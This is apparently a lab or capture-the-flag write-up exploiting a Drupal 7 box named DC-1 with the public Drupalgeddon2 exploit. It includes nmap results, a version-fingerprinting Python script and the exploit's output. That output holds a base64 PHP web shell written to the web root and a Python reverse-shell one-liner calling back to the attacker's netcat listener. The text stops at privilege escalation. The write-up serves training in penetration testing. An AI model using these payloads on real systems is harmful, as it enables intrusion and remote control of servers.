Pwned Date - 8th July 2022

Enumeration

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37524/udp   status
|   100024  1          41595/udp6  status
|   100024  1          52044/tcp   status
|_  100024  1          60318/tcp6  status
52044/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a tool called droopescan that specialises in scanning CMS websites such as Drupal:

https://github.com/SamJoan/droopescan

However, after some trial and error I gave up, as the current Kali is using Python 3.10.
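The version checks that matter at this stage are simple enough to do without droopescan: whether CHANGELOG.txt is readable, whether the Drupal 7 includes/ layout or the Drupal 8 core/ layout is present, and what the X-Generator header and the Generator meta tag say. The Python below is an added example, not part of droopescan or of the Drupalgeddon2 script; it runs against a constructed response table mirroring the HTTP responses this target gave (the 403 on includes/bootstrap.inc comes from Drupal's own .htaccess rule that denies *.inc files, which is why a 403 still counts as a hit). The fix thresholds in affected_by_sa_core_2018_002 are those published for SA-CORE-2018-002 (the Drupalgeddon2 advisory, CVE-2018-7600); the http_fetcher helper is only there for use against a live host.

```python
"""Drupal version fingerprint reproducing the checks the Drupalgeddon2 script
runs (CHANGELOG.txt, the Drupal 7 includes/ layout, X-Generator header,
Generator meta tag). Added example; the response table below is constructed
from the HTTP responses observed on this target, so the run is offline."""
import re

# Files that exist only in the Drupal 7 tree versus the Drupal 8+ tree.
D7_PATHS = ("/includes/bootstrap.inc", "/includes/database.inc")
D8_PATHS = ("/core/includes/bootstrap.inc", "/core/CHANGELOG.txt")


def path_exists(resp):
    # A 403 is still a hit: Apache found the file and only refused to serve it
    # (Drupal's .htaccess denies *.inc; the exploit output reports it as Found).
    return resp is not None and resp[0] in (200, 403)


def version_from_headers(headers):
    """Drupal 7 sends 'X-Generator: Drupal 7 (http://drupal.org)'."""
    gen = {k.lower(): v for k, v in headers.items()}.get("x-generator", "")
    m = re.search(r"Drupal (\d+)", gen)
    return f"{m.group(1)}.x" if m else None


def version_from_meta(body):
    """The same string is repeated in <meta name="Generator"> on every page."""
    m = re.search(r'<meta\s+name="Generator"\s+content="Drupal (\d+)', body, re.I)
    return f"{m.group(1)}.x" if m else None


def fingerprint(fetch):
    """fetch(path) -> (status, headers, body) or None. Returns the evidence found."""
    evidence = {}
    home = fetch("/")
    if home:
        v = version_from_headers(home[1]) or version_from_meta(home[2])
        if v:
            evidence["generator"] = v
    if any(path_exists(fetch(p)) for p in D7_PATHS):
        evidence["layout"] = "7.x"
    elif any(path_exists(fetch(p)) for p in D8_PATHS):
        evidence["layout"] = "8.x"
    # A readable CHANGELOG.txt gives the exact release; on this box it is a 404.
    ch = fetch("/CHANGELOG.txt")
    if ch and ch[0] == 200:
        m = re.search(r"Drupal (\d+\.\d+(?:\.\d+)?)", ch[2])
        if m:
            evidence["changelog"] = m.group(1)
    return evidence


def affected_by_sa_core_2018_002(version):
    """SA-CORE-2018-002 (Drupalgeddon2, CVE-2018-7600) was fixed in 7.58,
    8.3.9, 8.4.6 and 8.5.1; anything below the fix on its branch is exposed."""
    parts = tuple(int(x) for x in version.split("."))
    if parts[0] == 7:
        return parts < (7, 58)
    if parts[0] == 8:
        for fix in ((8, 3, 9), (8, 4, 6), (8, 5, 1)):
            if parts[:2] == fix[:2]:
                return parts < fix
        return parts < (8, 3, 9)  # 8.0-8.2 never got a fix; 8.6+ shipped fixed
    return False


def http_fetcher(base_url, timeout=5):
    """Fetcher for a live target (standard library only; not used offline)."""
    import urllib.error
    import urllib.request

    def fetch(path):
        req = urllib.request.Request(base_url.rstrip("/") + path)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                return r.status, dict(r.headers.items()), r.read(65536).decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            return e.code, dict(e.headers.items()), e.read(65536).decode("utf-8", "replace")
        except (urllib.error.URLError, OSError):
            return None
    return fetch


# Constructed from the responses seen in the Drupalgeddon2 output on this box.
CONSTRUCTED = {
    "/": (200, {"X-Generator": "Drupal 7 (http://drupal.org)"},
          '<meta name="Generator" content="Drupal 7 (http://drupal.org)" />'),
    "/includes/bootstrap.inc": (403, {}, "Forbidden"),
    "/includes/database.inc": (403, {}, "Forbidden"),
    "/CHANGELOG.txt": (404, {}, "Not Found"),
    "/core/CHANGELOG.txt": (404, {}, "Not Found"),
    "/core/includes/bootstrap.inc": (404, {}, "Not Found"),
}


def constructed_fetch(path):
    return CONSTRUCTED.get(path)


if __name__ == "__main__":
    print(fingerprint(constructed_fetch))  # {'generator': '7.x', 'layout': '7.x'}
```

Against the lab host, swap in `fingerprint(http_fetcher("http://192.168.81.193"))`. Note that the header and meta tag only give the major version; without a readable CHANGELOG.txt you cannot tell 7.57 from 7.58 this way, which is why the exploit script falls back to simply trying the injection.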

Exploitation

Moving on, I looked for a public exploit and found this:

https://github.com/dreadlocked/Drupalgeddon2

After downloading the script, I got an error when I tried to run it:

┌──(kali㉿VirtualBox)-[~]
└─$ wget https://raw.githubusercontent.com/dreadlocked/Drupalgeddon2/master/drupalgeddon2.rb

┌──(kali㉿VirtualBox)-[~]
└─$ ruby drupalgeddon2.rb               
<internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- highline/import (LoadError)
	from <internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require'
	from drupalgeddon2.rb:16:in `<main>'

A quick Stack Overflow search turned up the fix: the script needs the highline gem, installed by running

sudo gem install highline

Now the script runs cleanly and we get a shell as the user www-data:

┌──(kali㉿VirtualBox)-[~]
└─$ ruby drupalgeddon2.rb 192.168.81.193
[*] --==[::# Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.81.193/
--------------------------------------------------------------------------------
[!] MISSING: http://192.168.81.193/CHANGELOG.txt    (HTTP Response: 404)
[!] MISSING: http://192.168.81.193/core/CHANGELOG.txt    (HTTP Response: 404)
[+] Found  : http://192.168.81.193/includes/bootstrap.inc    (HTTP Response: 403)
[+] Header : v7 [X-Generator]
[!] MISSING: http://192.168.81.193/core/includes/bootstrap.inc    (HTTP Response: 404)
[!] MISSING: http://192.168.81.193/includes/database.inc    (HTTP Response: 403)
[+] Found  : http://192.168.81.193/    (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://192.168.81.193/    (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo GYLXAKEI
[+] Result : GYLXAKEI
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.81.193/shell.php)
[i] Response: HTTP 404 // Size: 13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.81.193/shell.php' -d 'c=hostname'

DC-1>> whoami
www-data

DC-1>> cat /home/local.txt
ccbae21310b846bfa659298f3eb3d1d6

This shell is really one fresh system() call per HTTP request, so it keeps no state and is very unstable; we will spawn a proper reverse shell to a netcat listener to continue.

Note that the redirect character > does not get through this shell, so we use a Python one-liner, which needs no redirection:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
┌──(kali㉿VirtualBox)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.81] from (UNKNOWN) [192.168.81.193] 37022
www-data@DC-1:/var/www$

Privilege Escalation

Listing SUID binaries by running